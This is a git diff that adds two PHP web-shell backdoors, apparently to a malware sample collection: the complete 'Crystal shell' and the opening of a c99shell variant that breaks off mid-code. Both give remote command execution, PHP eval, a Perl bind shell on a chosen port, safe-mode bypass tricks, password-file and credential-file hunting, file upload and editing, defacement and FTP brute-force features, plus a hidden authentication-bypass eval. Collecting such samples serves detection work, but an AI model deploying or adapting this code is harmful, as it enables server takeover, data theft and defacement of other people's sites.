diff --git a/PHP/Backdoor.PHP.Agent.aq b/PHP/Backdoor.PHP.Agent.aq new file mode 100644 index 00000000..4af5d517 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.aq @@ -0,0 +1,1127 @@ + + + + +Crystal shell + + + + + + + + + + +
+ +
+

 

+

+ + öCRYSTAL-H + Crystal hack shellphp 2006-2007

+

+ + +

+ + ON (secure)"; + + +} + +else {$safemode = false; $hsafemode = "OFF (not secure)";} +echo("Safe-mode: $hsafemode"); +// PHPINFO +if ($_GET['action'] == "phpinfo") { + echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm"; + exit; +} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} +echo("
"); +echo("Open base dir: $hopenbasedir"); +echo("
"); +echo "PostgreSQL: "; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "ON";}else{echo "OFF";} +echo("
"); +echo "MSSQL: "; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "ON";}else{echo "OFF";} +echo("
"); +echo "MySQL: "; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "ON"; } else { echo "OFF"; } +echo("
"); +echo "PHP version: ".@phpversion().""; +echo("
"); +echo "cURL: ".(($curl_on)?("ON"):("OFF")); + +echo("
"); +echo "Disable functions : "; +if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); + +?> +

+

 

+ + +

+

 

+ + + + + +

+

 

+

+
+ + + + OS:  

+Server:   + +

+ + +

User: + + + + + +
+ +1: +
+ +
  Back + + ð +phpinfo2 + + + + Tools4 + + + +  + +Decoderi + + + +  + + +ByPass` + + + +  + +SQL + + + + Bind + + + +help +sabout + +?

+

+[j + + + + server + : + + + + + + + + + + CGI v:          +  HTTP v:  Mail +admin:        + + +  
+ + + + + + + :  IP +  SERVER: + + + + + + + +          + + +                  + + +port + : + + + + +

+ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå

ÚÒíÒí ÇáãÓÊÎÏã
ÇÐÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑÞ
æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ .";} +if ($act == "bindport"){ +echo "
+/bin/bash +Port + + +
"; +} +if ($act == "tools"){ + echo "
+File to edit: + + +
"; + echo "
+
+ +
"; +echo "
+
Download here from: + +-->>: + + +
"; +} +if ($act == "about") {echo "
Coding by:

Super-Crystal
&
Mohajer22
-----
Thanks
TrYaG Team
ArabSecurityCenter Team
CRYSTAL-H Version:0 Beta phpshell code
Saudi Arabic .";} + +if ($act == "bind") {echo "
CRYSTAL-H:

-Connect Þã ÈÇáÖÛØ Úáì ÎíÇÑ.
.- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ
.-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì
nc -lp 3333ÈßÊÇÈÉ ÇáãäÝÐ -
ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá
Bind port to :
bind shell æåäíÆÇ ð áß .";} + +if ($act == "command") {echo "
CRYSTAL-H:

áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå Select ------ x ÇÖÛØ Úáì ÇáÎíÇÑ
.- æÇÐÇ ÇÑÏÊ ßÊÇÈå ÇáÇæÇãÑ ÈäÝÓß ÞÏ ÊßÊÝí ÈÇáÎíÇÑ
Command .";} + +if ($act == "team") {echo "
Arab Security Center Team

Super-Crystal
Medo-HaCKer
Anaconda
Alsb0r
ReeM-HaCK
NoOFa
AL-Alame
The YounG HackeR
Anti-Hack
Thanks .";} +if (array_key_exists('image', $_GET)) { + header('Content-Type: image/gif'); + die(getimage($_GET['image'])); +} + +if ($act == "bypass") { +echo " +
+
Execute:
+"; +echo (" bypass safemode with copy "); +echo "
+
read file : + +
"; +echo (" bypass safemode with CuRl"); +echo "
+
read file : + +
"; +echo (" bypass safemode with imap()"); +echo "
+
+ +
"; +echo (" bypass safemode with id()"); +echo "
+
+ +
"; +echo (" Exploit: error_log()"); +echo "
+
+ +
"; +} +if ($act == "decoder"){ +echo (" replace Chr()"); +echo "
+
+
+
"; +} +if ($act == "SQL"){ +echo (" MySQL "); +echo "
+
Username : +\n +password : +\n +\n +
"; +} +?> + + + +
+ +
+ + + +

+  

+

  + +
+ + + Exploit: error_log() By * Super-Crystal * + + + + + +
By * Super-Crystal * TrYaG Team
+ + + +
+ + +
+
+ + +
+
+ + + +
+", 3,$ERORR); +} +// id // +if ($_POST['plugin'] ){ + + + switch($_POST['plugin']){ + case("cat /etc/passwd"): + for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "
"; + } + } + + break; + + + } + } + +// imap // +$string = !empty($_POST['string']) ? $_POST['string'] : 0; +$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; + +if ($string && $switch == "file") { +$stream = imap_open($string, "", ""); + +$str = imap_body($stream, 1); +if (!empty($str)) +echo "
".$str."
"; +imap_close($stream); +} elseif ($string && $switch == "dir") { +$stream = imap_open("/etc/passwd", "", ""); +if ($stream == FALSE) +die("Can't open imap stream"); +$string = explode("|",$string); +if (count($string) > 1) +$dir_list = imap_list($stream, trim($string[0]), trim($string[1])); +else +$dir_list = imap_list($stream, trim($string[0]), "*"); +echo "
";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."
 
" ;
+echo "
"; +imap_close($stream); +} +// CURL // +if(empty($_POST['curl'])){ +} else { +$m=$_POST['curl']; +$ch = +curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +} + +// copy// +$u1p=""; +$tymczas=""; +if(empty($_POST['copy'])){ +} else { +$u1p=$_POST['copy']; +$temp=tempnam($tymczas, "cx"); +if(copy("compress.zlib://".$u1p, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); +} else { +die("
Sorry... File +".htmlspecialchars($u1p)." dosen't exists or you don't have +access.
"); +} +} + +@$dir = $_POST['dir']; +$dir = stripslashes($dir); + +@$cmd = $_POST['cmd']; +$cmd = stripslashes($cmd); +$REQUEST_URI = $_SERVER['REQUEST_URI']; +$dires = ''; +$files = ''; + + + + +if (isset($_POST['port'])){ +$bind = " +#!/usr/bin/perl + +\$port = {$_POST['port']}; +\$port = \$ARGV[0] if \$ARGV[0]; +exit if fork; +$0 = \"updatedb\" . \" \" x100; +\$SIG{CHLD} = 'IGNORE'; +use Socket; +socket(S, PF_INET, SOCK_STREAM, 0); +setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); +bind(S, sockaddr_in(\$port, INADDR_ANY)); +listen(S, 50); +while(1) +{ + accept(X, S); + unless(fork) + { + open STDIN, \"<&X\"; + open STDOUT, \">&X\"; + open STDERR, \">&X\"; + close X; + exec(\"/bin/sh\"); + } + close X; +} +";} + +function decode($buffer){ + +return convert_cyr_string ($buffer, 'd', 'w'); + +} + + + +function execute($com) +{ + + if (!empty($com)) + { + if(function_exists('exec')) + { + exec($com,$arr); + echo implode(' +',$arr); + } + elseif(function_exists('shell_exec')) + { + echo shell_exec($com); + + + } + elseif(function_exists('system')) +{ + + echo system($com); +} + elseif(function_exists('passthru')) + { + + echo passthru($com); + + } +} + +} + + +function perms($mode) +{ + +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} + + + + + + +if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") +{ +copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]); +} + +if((isset($_POST['fileto']))||(isset($_POST['filefrom']))) + +{ +$data = implode("", file($_POST['filefrom'])); +$fp = fopen($_POST['fileto'], "wb"); +fputs($fp, $data); +$ok = fclose($fp); +if($ok) +{ +$size = filesize($_POST['fileto'])/1024; +$sizef = sprintf("%.2f", $size); +print "
Download - OK. (".$sizef."??)
"; +} +else +{ +print "
Something is wrong. Download - IS NOT OK
"; +} +} + +if (isset($_POST['installbind'])){ + +if (is_dir($_POST['installpath']) == true){ +chdir($_POST['installpath']); +$_POST['installpath'] = "temp.pl";} + + +$fp = fopen($_POST['installpath'], "w"); +fwrite($fp, $bind); +fclose($fp); + +exec("perl " . $_POST['installpath']); +chdir($dir); + + +} + + +@$ef = stripslashes($_POST['editfile']); +if ($ef){ +$fp = fopen($ef, "r"); +$filearr = file($ef); + + + +$string = ''; +$content = ''; +foreach ($filearr as $string){ +$string = str_replace("<" , "<" , $string); +$string = str_replace(">" , ">" , $string); +$content = $content . $string; +} + +echo "
Edit file: $ef
+ +
+
"; +fclose($fp); +} + +if(isset($_POST['savefile'])){ + +$fp = fopen($_POST['savefile'], "w"); +$content = stripslashes($content); +fwrite($fp, $content); +fclose($fp); +echo "
saved -OK!
"; + +} + + +if (isset($_POST['php'])){ + +echo "
eval code

+
"; +} + + + +if(isset($_POST['phpcode'])){ + +echo "
Results of PHP execution

"; +@eval(stripslashes($_POST['phpcode'])); +echo "
"; + + +} + + +if ($cmd){ + +if($sertype == "winda"){ +ob_start(); +execute($cmd); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} +else{ +ob_start(); +echo decode(execute($cmd)); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} + +if (trim($buffer)){ +echo "
Command: $cmd
"; +} + +} +$arr = array(); + +$arr = array_merge($arr, glob("*")); +$arr = array_merge($arr, glob(".*")); +$arr = array_merge($arr, glob("*.*")); +$arr = array_unique($arr); +sort($arr); +echo ""; + +foreach ($arr as $filename) { + +if ($filename != "." and $filename != ".."){ + +if (is_dir($filename) == true){ +$directory = ""; +$directory = $directory . "";} +else{ +$directory = $directory . ""; + +} + +if (is_readable($filename) == true){ +$directory = $directory . "";} +else{ +$directory = $directory . ""; +} +$dires = $dires . $directory; +} + +if (is_file($filename) == true){ +$file = ""; +$file = $file . "";} +else{ +$file = $file . ""; +} + +if (is_readable($filename) == true){ +$file = $file . "";} +else{ +$file = $file . ""; +} +$files = $files . $file; +} + + + +} + + + +} +echo $dires; +echo $files; +echo "
NameTypeSizeLast accessLast changePermsWriteRead
$filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$directory = $directory . "YesNoYesNo
$filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$file = $file . "YesNoYes
No

"; + + + + +echo " +
+Command: + + +Directory: +
"; + + + + + +if (ini_get('safe_mode') == 1){echo "
SAFE MOD IS ON
+Including from here: " +. ini_get('safe_mode_include_dir') . "
Exec here: " . ini_get('safe_mode_exec_dir'). "";} + + + + +?> + + +

+

+ < 


+ +

+ + :: + Executed command ::

+ +Command:"; +?> + f

+  

+
+
+ Selectg 
Bind port toÂ
+ + + + + + + + +
+

+ + + + ::Edit/Create + file::"

+  ÇáÊÍÑíÑ æÇáÇäÔÇÁ:

Þã ÈæÖÚ ÇÓã ÇáãáÝ ÇáÐí ÊÑíÏ ÊÍÑíÑå ÝÞØ
æÈÚÏ ÐÇáß ÇáÖÛØ Úáì config.php ãËÇá
Edit
ÓÊÙåÑ áß äÇÝÐå ÈåÇ ãÍÊæíÇÊ ÇáãáÝ
æÇíÖÇ ð ÇÐÇ ÇÑÏÊ ÇäÔÇÁ ãáÝ ÝÞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ
æÈÚÏ ÐÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt .";} +?> +

+

 

+

+File to edit: + + +

"; +?> +

+

+ ÑÝÚ ÇáãáÝÇÊ:

Þã ÈÊÍÏíÏ ÇáãáÝ ÇáãÑÇÏ ÑÝÚå
æÈÚÏ ÐÇáß Þã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ
UPLOAD< .";} +?>:: + + + upload::Ņ

  + + + + +
"; +?> +

+ +

 Defacer Zone-H

  +

+ CRYSTAL-H:

ÇÓã ÇáãÚáä Defacer
ÇáãæÞÚ ÇáãÎÊÑÞ Victim
æÖÚ ÇáÇÎÊÑÇÞ Çí äæÚ ÇáËÛÑå ÇáÊì ÇÓÊËãÑÊåÇ Attack Mode
ÓÈÈ ÇáÇÎÊÑÇÞ Attack Reason
áÇÑÓÇá ÇáÇÎÊÑÇÞ sand
áÑÄíå ÇÎÑ ÇáÊÍÐíÑÇÊ ÇáãÑÓáå ÈÇáãæÞÚ Attacks On Hold.";} +?>

+ + + Defacer + + Zone-h

+ + + + + +
+ + + +
+ + + +
 
+ + + + + + + + +
+ ::Defacer:::è + +
+ ::Victim:::è +
+ + Attack Mode:è +
+ + Attack Reason:è +
+ + +
 
+ + + +
+   :   + +L + + Attacks On Hold + +L

+
+

+ +  yCrystal shell v. 1 beta  ©oded by TrYaG Team l Arab Security Center Team |securityCenter| + : Web x

 

+ + + + +
+ +  + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CRYSTAL-H + 2006
PPSCPCC
1
2 3 4 5 6 7 8
9 10 11 12 1314 15
16 17 181920 21 22
23242526272829
3031
+ +
+ + + diff --git a/PHP/Backdoor.PHP.Agent.ar b/PHP/Backdoor.PHP.Agent.ar new file mode 100644 index 00000000..6ef39c39 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ar @@ -0,0 +1,2735 @@ +array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext1","ext2","ext3",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"), + "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar") +); + +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "11457"; // default port for binding + +/* Command-aliases system */ +$aliases = array(); +$aliases[] = array("-----------------------------------------------------------", "ls -la"); +/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); +/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); +/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); +/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); +/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); +/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\""); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\""); +/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); +/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); +/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); +/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); +/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); +/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); +/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); +/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen"); + +$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie" +$sess_cookie = "c99shvars"; // cookie-variable name + +if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));} +$sess_file = $tmpdir."c99shvars_".$sid.".tmp"; + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Delete copied files from buffer after pasting + +//Quick launch +$quicklaunch = array(); +$quicklaunch[] = array("",$surl); +$quicklaunch[] = array("","#\" onclick=\"history.back(1)"); +$quicklaunch[] = array("","#\" onclick=\"history.go(1)"); +$quicklaunch[] = array("",$surl."act=ls&d=%upd"); +$quicklaunch[] = array("",""); +$quicklaunch[] = array("",$surl."act=search&d=%d"); +$quicklaunch[] = array("",$surl."act=fsbuff&d=%d"); +$quicklaunch[] = array("Mass deface",$surl."act=massdeface&d=%d"); +$quicklaunch[] = array("Bind",$surl."act=bind&d=%d"); +$quicklaunch[] = array("Processes",$surl."act=ps_aux&d=%d"); +$quicklaunch[] = array("FTP Quick brute",$surl."act=ftpquickbrute&d=%d"); +$quicklaunch[] = array("LSA",$surl."act=lsa&d=%d"); +$quicklaunch[] = array("SQL",$surl."act=sql&d=%d"); +$quicklaunch[] = array("PHP-code",$surl."act=eval&d=%d"); +$quicklaunch[] = array("PHP-info",$surl."act=phpinfo\" target=\"blank=\"_target"); +$quicklaunch[] = array("Self remove",$surl."act=selfremove"); +$quicklaunch[] = array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()"); + +//Hignlight-code colors +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; + +@$f = $_GET[f]; + +//END CONFIGURATION + +// \/ Next code not for editing \/ + + +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +@set_time_limit(0); +if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} +if(!ini_get("register_globals")) {import_request_variables("GPC");} +$starttime = getmicrotime(); +if (get_magic_quotes_gpc()) +{ +if (!function_exists("strips")) +{ + function strips(&$el) + { + if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } + else {$el = stripslashes($el);} + } +} +strips($GLOBALS); +} +$tmp = array(); +foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} + +if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} +elseif(empty($md5_pass)) {$md5_pass = md5($pass);} +if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) +{ + header("WWW-Authenticate: Basic realm=\"c99shell\""); + header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} + exit; +} + +$lastdir = realpath("."); +chdir($curdir); + +if (($selfwrite) or ($updatenow)) +{ + if ($selfwrite == "1") {$selfwrite = "c99shell.php";} + c99sh_getupdate(); + $data = file_get_contents($c99sh_updatefurl); + $fp = fopen($data,"w"); + fwrite($fp,$data); + fclose($fp); + exit; +} +if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);} +if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));} +else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);} +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} +$sess_data["copy"] = array_unique($sess_data["copy"]); +$sess_data["cut"] = array_unique($sess_data["cut"]); + +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_method; + global $sess_cookie; + global $sess_file; + global $sess_data; + $sess_data = $data; + $data = serialize($data); + if ($sess_method == "file") + { + $fp = fopen($sess_file,"w"); + fwrite($fp,$data); + fclose($fp); + } + else {setcookie($sess_cookie,$data);} +} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0, $len)."...".substr($content, -$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\","/",$d); + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} + else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);} + if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (!is_dir($t)) {mkdir($t);} + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) + { + + return copy($d,$t); + } + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + error_reporting(9999); + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} + else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) {return rename($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o."/"); rmdir($d.$o);} + } + } + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\","/",$o); + if (is_dir($o)) + { + if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ + function myshellexec($cmd) + { + return system($cmd); + } +} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + $perms = ($mode & 00400) ? "r" : "-"; + $perms .= ($mode & 00200) ? "w" : "-"; + $perms .= ($mode & 00100) ? "x" : "-"; + $perms .= ($mode & 00040) ? "r" : "-"; + $perms .= ($mode & 00020) ? "w" : "-"; + $perms .= ($mode & 00010) ? "x" : "-"; + $perms .= ($mode & 00004) ? "r" : "-"; + $perms .= ($mode & 00002) ? "w" : "-"; + $perms .= ($mode & 00001) ? "x" : "-"; + return $perms; +} +} +if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} +if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate() +{ + global $updatenow; + $data = @file_get_contents($c99sh_updatefurl); + if (!$data) {echo "Can't fetch update-information!";} + else + { + $data = unserialize(base64_decode($data)); + if (!is_array($data)) {echo "Corrupted update-information!";} + else + { + if ($shver < $data[cur]) {$updatenow = true;} + } + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = true;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + global $win; + if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + global $SERVER_ADDR; + global $SERVER_NAME; + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." +# Date: ".date("d.m.Y H:i:s")." +# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\" +#--------------------------------------------------------- +"; + $c = 